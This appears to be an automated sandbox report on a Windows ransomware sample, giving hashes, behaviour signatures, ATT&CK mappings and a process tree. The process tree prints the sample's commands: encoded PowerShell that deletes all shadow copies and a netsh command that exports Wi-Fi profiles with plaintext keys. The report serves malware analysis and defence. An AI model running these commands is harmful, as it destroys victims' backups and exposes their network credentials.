b6c672b1cbce711c3881a4316fa2ea60e17302fc42c1b8daa327582172fc96ba

Analysis

max time kernel
117s
max time network
117s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
25-01-2024 17:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b6c672b1cbce711c3881a4316fa2ea60e17302fc42c1b8daa327582172fc96ba.exe
Size

947KB
MD5

dcefbbb5757c8527b8b7a62f515e0910
SHA1

44cd249fcbb8990dc9f40e73f86158d22dbb16bb
SHA256

b6c672b1cbce711c3881a4316fa2ea60e17302fc42c1b8daa327582172fc96ba
SHA512

7bf0a6cf64d1c96786a5b975fba6592989669dcc2e92f0f9d9e1d3c098dfd758597a27246ff3b910f2dc2df17568007cf12c18caf71e5c27a774c5e354ae01a4
SSDEEP

12288:+coJMvnKm7bR3zc4jAEJWYgeWYg955/155/kJ2kVkIPHusDNNQzCbQMoG9E/nVJW:7uMvDzc4jAc2EPJNq+aW

Score

9^/10

ransomware

Malware Config

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\System32\ok.txt	b6c672b1cbce711c3881a4316fa2ea60e17302fc42c1b8daa327582172fc96ba.exe
File opened for modification	C:\Windows\System32\ok.txt.apb	b6c672b1cbce711c3881a4316fa2ea60e17302fc42c1b8daa327582172fc96ba.exe
File created	C:\Windows\System32\temp.tmp.bmp	b6c672b1cbce711c3881a4316fa2ea60e17302fc42c1b8daa327582172fc96ba.exe
File opened for modification	C:\Windows\System32\temp.tmp.jpg	b6c672b1cbce711c3881a4316fa2ea60e17302fc42c1b8daa327582172fc96ba.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
2588	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1808	powershell.exe
1336	powershell.exe
2668	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	1808	powershell.exe
Token: SeDebugPrivilege	1336	powershell.exe
Token: SeDebugPrivilege	2668	powershell.exe
Token: SeBackupPrivilege	2492	vssvc.exe
Token: SeRestorePrivilege	2492	vssvc.exe
Token: SeAuditPrivilege	2492	vssvc.exe

Suspicious use of WriteProcessMemory 27 IoCs

description	pid	Process	procid_target
PID 2032 wrote to memory of 2172	2032	b6c672b1cbce711c3881a4316fa2ea60e17302fc42c1b8daa327582172fc96ba.exe	29
PID 2032 wrote to memory of 2172	2032	b6c672b1cbce711c3881a4316fa2ea60e17302fc42c1b8daa327582172fc96ba.exe	29
PID 2032 wrote to memory of 2172	2032	b6c672b1cbce711c3881a4316fa2ea60e17302fc42c1b8daa327582172fc96ba.exe	29
PID 2172 wrote to memory of 1808	2172	cmd.exe	30
PID 2172 wrote to memory of 1808	2172	cmd.exe	30
PID 2172 wrote to memory of 1808	2172	cmd.exe	30
PID 1808 wrote to memory of 1336	1808	powershell.exe	31
PID 1808 wrote to memory of 1336	1808	powershell.exe	31
PID 1808 wrote to memory of 1336	1808	powershell.exe	31
PID 1336 wrote to memory of 2668	1336	powershell.exe	32
PID 1336 wrote to memory of 2668	1336	powershell.exe	32
PID 1336 wrote to memory of 2668	1336	powershell.exe	32
PID 2668 wrote to memory of 2588	2668	powershell.exe	35
PID 2668 wrote to memory of 2588	2668	powershell.exe	35
PID 2668 wrote to memory of 2588	2668	powershell.exe	35
PID 2032 wrote to memory of 1724	2032	b6c672b1cbce711c3881a4316fa2ea60e17302fc42c1b8daa327582172fc96ba.exe	36
PID 2032 wrote to memory of 1724	2032	b6c672b1cbce711c3881a4316fa2ea60e17302fc42c1b8daa327582172fc96ba.exe	36
PID 2032 wrote to memory of 1724	2032	b6c672b1cbce711c3881a4316fa2ea60e17302fc42c1b8daa327582172fc96ba.exe	36
PID 1724 wrote to memory of 952	1724	cmd.exe	37
PID 1724 wrote to memory of 952	1724	cmd.exe	37
PID 1724 wrote to memory of 952	1724	cmd.exe	37
PID 2032 wrote to memory of 2052	2032	b6c672b1cbce711c3881a4316fa2ea60e17302fc42c1b8daa327582172fc96ba.exe	38
PID 2032 wrote to memory of 2052	2032	b6c672b1cbce711c3881a4316fa2ea60e17302fc42c1b8daa327582172fc96ba.exe	38
PID 2032 wrote to memory of 2052	2032	b6c672b1cbce711c3881a4316fa2ea60e17302fc42c1b8daa327582172fc96ba.exe	38
PID 2032 wrote to memory of 2312	2032	b6c672b1cbce711c3881a4316fa2ea60e17302fc42c1b8daa327582172fc96ba.exe	39
PID 2032 wrote to memory of 2312	2032	b6c672b1cbce711c3881a4316fa2ea60e17302fc42c1b8daa327582172fc96ba.exe	39
PID 2032 wrote to memory of 2312	2032	b6c672b1cbce711c3881a4316fa2ea60e17302fc42c1b8daa327582172fc96ba.exe	39

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\b6c672b1cbce711c3881a4316fa2ea60e17302fc42c1b8daa327582172fc96ba.exe
"C:\Users\Admin\AppData\Local\Temp\b6c672b1cbce711c3881a4316fa2ea60e17302fc42c1b8daa327582172fc96ba.exe"
1⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -eNcODeDcOmMAnd cABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBOAGMATwBEAGUARABjAE8AbQBNAEEAbgBkACAAYwBBAEIAdgBBAEgAYwBBAFoAUQBCAHkAQQBIAE0AQQBhAEEAQgBsAEEARwB3AEEAYgBBAEEAZwBBAEMAMABBAFoAUQBCAE8AQQBHAE0AQQBUAHcAQgBFAEEARwBVAEEAUgBBAEIAagBBAEUAOABBAGIAUQBCAE4AQQBFAEUAQQBiAGcAQgBrAEEAQwBBAEEAWgBBAEIAbgBBAEUASQBBAGUAZwBCAEIAQQBFAGcAQQBUAFEAQgBCAEEARgBrAEEAVQBRAEIAQwBBAEcAcwBBAFEAUQBCAEgAQQBEAEEAQQBRAFEAQgBoAEEARgBFAEEAUQBnAEIAMQBBAEUARQBBAFEAdwBCAEIAQQBFAEUAQQBXAGcAQgBCAEEARQBJAEEAYgBBAEIAQgBBAEUAYwBBAGQAdwBCAEIAQQBGAG8AQQBVAFEAQgBDAEEARABBAEEAUQBRAEIASABBAEYAVQBBAFEAUQBCAEoAQQBFAEUAQQBRAGcAQgA2AEEARQBFAEEAUgB3AEIAbgBBAEUARQBBAFcAUQBCAFIAQQBFAEkAQQBhAHcAQgBCAEEARQBjAEEATwBBAEIAQgBBAEcAUQBBAGQAdwBCAEMAQQBIAG8AQQBRAFEAQgBEAEEARQBFAEEAUQBRAEIATQBBAEgAYwBBAFEAZwBCAG8AQQBFAEUAQQBSAHcAQgAzAEEARQBFAEEAWQBnAEIAQgBBAEUARQBBAFoAdwBCAEIAQQBFAE0AQQBPAEEAQgBCAEEARwBNAEEAVQBRAEIAQwBBAEQARQBBAFEAUQBCAEgAQQBHAHMAQQBRAFEAQgBhAEEARgBFAEEAUQBnAEEAdwBBAEUARQBBAFEAUQBBADkAQQBEADAAQQA=
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2172
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -eNcODeDcOmMAnd cABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBOAGMATwBEAGUARABjAE8AbQBNAEEAbgBkACAAYwBBAEIAdgBBAEgAYwBBAFoAUQBCAHkAQQBIAE0AQQBhAEEAQgBsAEEARwB3AEEAYgBBAEEAZwBBAEMAMABBAFoAUQBCAE8AQQBHAE0AQQBUAHcAQgBFAEEARwBVAEEAUgBBAEIAagBBAEUAOABBAGIAUQBCAE4AQQBFAEUAQQBiAGcAQgBrAEEAQwBBAEEAWgBBAEIAbgBBAEUASQBBAGUAZwBCAEIAQQBFAGcAQQBUAFEAQgBCAEEARgBrAEEAVQBRAEIAQwBBAEcAcwBBAFEAUQBCAEgAQQBEAEEAQQBRAFEAQgBoAEEARgBFAEEAUQBnAEIAMQBBAEUARQBBAFEAdwBCAEIAQQBFAEUAQQBXAGcAQgBCAEEARQBJAEEAYgBBAEIAQgBBAEUAYwBBAGQAdwBCAEIAQQBGAG8AQQBVAFEAQgBDAEEARABBAEEAUQBRAEIASABBAEYAVQBBAFEAUQBCAEoAQQBFAEUAQQBRAGcAQgA2AEEARQBFAEEAUgB3AEIAbgBBAEUARQBBAFcAUQBCAFIAQQBFAEkAQQBhAHcAQgBCAEEARQBjAEEATwBBAEIAQgBBAEcAUQBBAGQAdwBCAEMAQQBIAG8AQQBRAFEAQgBEAEEARQBFAEEAUQBRAEIATQBBAEgAYwBBAFEAZwBCAG8AQQBFAEUAQQBSAHcAQgAzAEEARQBFAEEAWQBnAEIAQgBBAEUARQBBAFoAdwBCAEIAQQBFAE0AQQBPAEEAQgBCAEEARwBNAEEAVQBRAEIAQwBBAEQARQBBAFEAUQBCAEgAQQBHAHMAQQBRAFEAQgBhAEEARgBFAEEAUQBnAEEAdwBBAEUARQBBAFEAUQBBADkAQQBEADAAQQA=
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1808
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eNcODeDcOmMAnd cABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBOAGMATwBEAGUARABjAE8AbQBNAEEAbgBkACAAZABnAEIAegBBAEgATQBBAFkAUQBCAGsAQQBHADAAQQBhAFEAQgB1AEEAQwBBAEEAWgBBAEIAbABBAEcAdwBBAFoAUQBCADAAQQBHAFUAQQBJAEEAQgB6AEEARwBnAEEAWQBRAEIAawBBAEcAOABBAGQAdwBCAHoAQQBDAEEAQQBMAHcAQgBoAEEARwB3AEEAYgBBAEEAZwBBAEMAOABBAGMAUQBCADEAQQBHAGsAQQBaAFEAQgAwAEEAQQA9AD0A
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1336
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eNcODeDcOmMAnd dgBzAHMAYQBkAG0AaQBuACAAZABlAGwAZQB0AGUAIABzAGgAYQBkAG8AdwBzACAALwBhAGwAbAAgAC8AcQB1AGkAZQB0AA==
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2668
      - C:\Windows\system32\vssadmin.exe
        
        "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
        6⤵
        Interacts with shadow copies
        
        PID:2588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh wlan export profile folder="C:\Windows\System32\wifies\\" key=clear && cls
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1724
- - C:\Windows\system32\netsh.exe
    netsh wlan export profile folder="C:\Windows\System32\wifies\\" key=clear
    3⤵
    PID:952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c dir /s /b /a-d C:\Windows\System32\wifies\
  2⤵
  PID:2052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c pause
  2⤵
  PID:2312

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2492

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:2024

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O4FDZQKRLSJ8XJ5K39Z3.temp

Filesize
7KB

MD5
1de6ef1782c448f4318ee10fe82c58c1

SHA1
b58ed55472b3a8cee00ca0291fe28d123cc01416

SHA256
05b4e1280e454f236cc3648dca17a51340cfb085c3d15361d384a1b0c75cef8d

SHA512
3f350fc32a5f8f8c0d05c640541703966eef49cead2f562169f048119ecb52477528fdd7c57a928e1fc846407fa0edda38b286642ff703395c2be76b36a5adcd

Download Submit
C:\Windows\System32\temp.tmp.bmp

Filesize
128KB

MD5
2b51e02c423ab45fb017b344e01d7439

SHA1
9216d5d03e011b07a6e61d34d605350eb4611ed2

SHA256
83888243c2c2e2d167a951668595bc9d913686fe0ef7fd159f49a48bd02985f0

SHA512
227a85e906df279853c7836f530c8fedfe3e771ccbd1c123cc7a538cc182ad10f3e075d2ef8b5ae240723481f4728ca127367d740124bcb44cc829b4e5cdf12f

Download Submit
memory/1336-21-0x00000000029E0000-0x0000000002A60000-memory.dmp

Filesize
512KB

Download
memory/1336-17-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

Filesize
9.6MB

Download
memory/1336-19-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

Filesize
9.6MB

Download
memory/1336-20-0x00000000029E0000-0x0000000002A60000-memory.dmp

Filesize
512KB

Download
memory/1336-33-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

Filesize
9.6MB

Download
memory/1336-18-0x00000000029E0000-0x0000000002A60000-memory.dmp

Filesize
512KB

Download
memory/1808-6-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

Filesize
9.6MB

Download
memory/1808-10-0x0000000002BC0000-0x0000000002C40000-memory.dmp

Filesize
512KB

Download
memory/1808-12-0x0000000002BC0000-0x0000000002C40000-memory.dmp

Filesize
512KB

Download
memory/1808-9-0x0000000002BC0000-0x0000000002C40000-memory.dmp

Filesize
512KB

Download
memory/1808-8-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

Filesize
9.6MB

Download
memory/1808-7-0x0000000002BC0000-0x0000000002C40000-memory.dmp

Filesize
512KB

Download
memory/1808-4-0x000000001B710000-0x000000001B9F2000-memory.dmp

Filesize
2.9MB

Download
memory/1808-5-0x0000000001E00000-0x0000000001E08000-memory.dmp

Filesize
32KB

Download
memory/1808-34-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

Filesize
9.6MB

Download
memory/2032-83-0x000000013F2C0000-0x000000013F3B9000-memory.dmp

Filesize
996KB

Download
memory/2032-81-0x000000013F2C0000-0x000000013F3B9000-memory.dmp

Filesize
996KB

Download
memory/2668-28-0x0000000001DB0000-0x0000000001E30000-memory.dmp

Filesize
512KB

Download
memory/2668-32-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

Filesize
9.6MB

Download
memory/2668-30-0x0000000001DB0000-0x0000000001E30000-memory.dmp

Filesize
512KB

Download
memory/2668-31-0x0000000001DB0000-0x0000000001E30000-memory.dmp

Filesize
512KB

Download
memory/2668-29-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

Filesize
9.6MB

Download
memory/2668-27-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

Filesize
9.6MB

Download